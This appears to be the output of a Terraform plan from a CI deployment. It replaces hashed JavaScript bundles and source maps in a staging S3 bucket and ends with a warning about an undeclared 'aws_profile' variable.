module.thadmin_hosting.aws_s3_object.code_build_object["js/app.45964e33.js.map"] will be destroyed

resource "aws_s3_object" "code_build_object" {

arn                    = "arn:aws:s3:::thalia-thadmin-staging/js/app.45964e33.js.map" -> null
bucket                 = "thalia-thadmin-staging" -> null
bucket_key_enabled     = false -> null
content_type           = "application/octet-stream" -> null
etag                   = "54ff5b954b6cd6411ae2f7bafe54debe" -> null
force_destroy          = false -> null
id                     = "thalia-thadmin-staging/js/app.45964e33.js.map" -> null
key                    = "js/app.45964e33.js.map" -> null
metadata               = {} -> null
region                 = "eu-west-1" -> null
server_side_encryption = "AES256" -> null
source                 = "/home/runner/work/thadmin/thadmin/infra/modules/hosting/../../..//dist/js/app.45964e33.js.map" -> null
storage_class          = "STANDARD" -> null
tags                   = {} -> null
tags_all               = {} -> null

}



module.thadmin_hosting.aws_s3_object.code_build_object["js/app.b792ffcf.js"] will be created

resource "aws_s3_object" "code_build_object" {

acl                    = (known after apply)
arn                    = (known after apply)
bucket                 = "thalia-thadmin-staging"
bucket_key_enabled     = (known after apply)
checksum_crc32         = (known after apply)
checksum_crc32c        = (known after apply)
checksum_crc64nvme     = (known after apply)
checksum_sha1          = (known after apply)
checksum_sha256        = (known after apply)
content_type           = "text/javascript"
etag                   = "7be684ee94dbfbb012048313df0d1280"
force_destroy          = false
id                     = (known after apply)
key                    = "js/app.b792ffcf.js"
kms_key_id             = (known after apply)
region                 = "eu-west-1"
server_side_encryption = (known after apply)
source                 = "/home/runner/work/thadmin/thadmin/infra/modules/hosting/../../..//dist/js/app.b792ffcf.js"
storage_class          = (known after apply)
tags_all               = (known after apply)
version_id             = (known after apply)

}



module.thadmin_hosting.aws_s3_object.code_build_object["js/app.b792ffcf.js.map"] will be created

resource "aws_s3_object" "code_build_object" {

acl                    = (known after apply)
arn                    = (known after apply)
bucket                 = "thalia-thadmin-staging"
bucket_key_enabled     = (known after apply)
checksum_crc32         = (known after apply)
checksum_crc32c        = (known after apply)
checksum_crc64nvme     = (known after apply)
checksum_sha1          = (known after apply)
checksum_sha256        = (known after apply)
content_type           = "application/octet-stream"
etag                   = "aa008a2543be22086c573c7738506359"
force_destroy          = false
id                     = (known after apply)
key                    = "js/app.b792ffcf.js.map"
kms_key_id             = (known after apply)
region                 = "eu-west-1"
server_side_encryption = (known after apply)
source                 = "/home/runner/work/thadmin/thadmin/infra/modules/hosting/../../..//dist/js/app.b792ffcf.js.map"
storage_class          = (known after apply)
tags_all               = (known after apply)
version_id             = (known after apply)

}



module.thadmin_hosting.aws_s3_object.code_build_object["js/chunk-vendors.2b542f8a.js"] will be created

resource "aws_s3_object" "code_build_object" {

acl                    = (known after apply)
arn                    = (known after apply)
bucket                 = "thalia-thadmin-staging"
bucket_key_enabled     = (known after apply)
checksum_crc32         = (known after apply)
checksum_crc32c        = (known after apply)
checksum_crc64nvme     = (known after apply)
checksum_sha1          = (known after apply)
checksum_sha256        = (known after apply)
content_type           = "text/javascript"
etag                   = "48786ccc6e843f262296265814581ee2"
force_destroy          = false
id                     = (known after apply)
key                    = "js/chunk-vendors.2b542f8a.js"
kms_key_id             = (known after apply)
region                 = "eu-west-1"
server_side_encryption = (known after apply)
source                 = "/home/runner/work/thadmin/thadmin/infra/modules/hosting/../../..//dist/js/chunk-vendors.2b542f8a.js"
storage_class          = (known after apply)
tags_all               = (known after apply)
version_id             = (known after apply)

}



module.thadmin_hosting.aws_s3_object.code_build_object["js/chunk-vendors.2b542f8a.js.map"] will be created

resource "aws_s3_object" "code_build_object" {

acl                    = (known after apply)
arn                    = (known after apply)
bucket                 = "thalia-thadmin-staging"
bucket_key_enabled     = (known after apply)
checksum_crc32         = (known after apply)
checksum_crc32c        = (known after apply)
checksum_crc64nvme     = (known after apply)
checksum_sha1          = (known after apply)
checksum_sha256        = (known after apply)
content_type           = "application/octet-stream"
etag                   = "dd1d88a50a1b958b9f09043fec15d24a"
force_destroy          = false
id                     = (known after apply)
key                    = "js/chunk-vendors.2b542f8a.js.map"
kms_key_id             = (known after apply)
region                 = "eu-west-1"
server_side_encryption = (known after apply)
source                 = "/home/runner/work/thadmin/thadmin/infra/modules/hosting/../../..//dist/js/chunk-vendors.2b542f8a.js.map"
storage_class          = (known after apply)
tags_all               = (known after apply)
version_id             = (known after apply)

}



module.thadmin_hosting.aws_s3_object.code_build_object["js/chunk-vendors.cb611119.js"] will be destroyed

resource "aws_s3_object" "code_build_object" {

arn                    = "arn:aws:s3:::thalia-thadmin-staging/js/chunk-vendors.cb611119.js" -> null
bucket                 = "thalia-thadmin-staging" -> null
bucket_key_enabled     = false -> null
content_type           = "text/javascript" -> null
etag                   = "a5733cdf4026f6c35352b1ab3d664edd" -> null
force_destroy          = false -> null
id                     = "thalia-thadmin-staging/js/chunk-vendors.cb611119.js" -> null
key                    = "js/chunk-vendors.cb611119.js" -> null
metadata               = {} -> null
region                 = "eu-west-1" -> null
server_side_encryption = "AES256" -> null
source                 = "/home/runner/work/thadmin/thadmin/infra/modules/hosting/../../..//dist/js/chunk-vendors.cb611119.js" -> null
storage_class          = "STANDARD" -> null
tags                   = {} -> null
tags_all               = {} -> null

}



module.thadmin_hosting.aws_s3_object.code_build_object["js/chunk-vendors.cb611119.js.map"] will be destroyed

resource "aws_s3_object" "code_build_object" {

arn                    = "arn:aws:s3:::thalia-thadmin-staging/js/chunk-vendors.cb611119.js.map" -> null
bucket                 = "thalia-thadmin-staging" -> null
bucket_key_enabled     = false -> null
content_type           = "application/octet-stream" -> null
etag                   = "39075a857beea0e18811cd71b81da717" -> null
force_destroy          = false -> null
id                     = "thalia-thadmin-staging/js/chunk-vendors.cb611119.js.map" -> null
key                    = "js/chunk-vendors.cb611119.js.map" -> null
metadata               = {} -> null
region                 = "eu-west-1" -> null
server_side_encryption = "AES256" -> null
source                 = "/home/runner/work/thadmin/thadmin/infra/modules/hosting/../../..//dist/js/chunk-vendors.cb611119.js.map" -> null
storage_class          = "STANDARD" -> null
tags                   = {} -> null
tags_all               = {} -> null

}



Plan: 6 to add, 2 to change, 6 to destroy.
Warning: Value for undeclared variable
The root module does not declare a variable named "aws_profile" but a value

was found in file "terraform.tfvars". To use this value, add a "variable"

block to the configuration.
Using a variables file to set an undeclared variable is deprecated and will

become an error in a future release. If you wish to provide certain "global"

settings to all configurations in your organization, use TF_VAR_...

environment variables to set these instead.

Note: You didn't specify an "-out" parameter to save this plan, so Terraform

can't guarantee that exactly these actions will be performed if

"terraform apply" is subsequently run.